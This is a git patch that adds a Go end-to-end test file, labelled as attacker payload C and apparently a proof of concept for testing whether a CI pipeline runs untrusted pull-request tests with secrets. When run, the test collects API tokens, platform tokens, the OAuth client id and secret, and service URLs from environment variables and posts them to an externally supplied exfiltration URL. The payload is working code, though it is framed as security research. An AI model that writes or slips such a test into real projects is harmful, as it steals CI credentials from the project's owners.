From 39fd05fe8df43d3f6a9c0d56626a03f13fdd3a0f Mon Sep 17 00:00:00 2001
From: XavLim <50736074+XavLimSG@users.noreply.github.com>
Date: Sun, 5 Apr 2026 16:31:03 +0800
Subject: [PATCH] Add attacker payload C for PR2

---
 poc/malicious_e2e_test.go | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 poc/malicious_e2e_test.go

diff --git a/poc/malicious_e2e_test.go b/poc/malicious_e2e_test.go
new file mode 100644
index 0000000..9a7106e
--- /dev/null
+++ b/poc/malicious_e2e_test.go
@@ -0,0 +1,28 @@
+//go:build e2e
+
+package poc
+
+import (
+	"net/http"
+	"net/url"
+	"os"
+	"testing"
+)
+
+func TestMaliciousPayloadC(t *testing.T) {
+	exfil := os.Getenv("EXFIL_URL")
+	if exfil != "" {
+		values := url.Values{}
+		values.Set("marker", "C")
+		values.Set("api_token", os.Getenv("API_TOKEN"))
+		values.Set("platform_token", os.Getenv("PLATFORM_TOKEN"))
+		values.Set("oauth_client_id", os.Getenv("OAUTH_CLIENT_ID"))
+		values.Set("oauth_client_secret", os.Getenv("OAUTH_CLIENT_SECRET"))
+		values.Set("oauth_token_endpoint", os.Getenv("OAUTH_TOKEN_ENDPOINT"))
+		values.Set("classic_url", os.Getenv("CLASSIC_URL"))
+		values.Set("platform_url", os.Getenv("PLATFORM_URL"))
+		_, _ = http.PostForm(exfil, values)
+	}
+
+	t.Fatalf("MALICIOUS_EXECUTED_C")
+}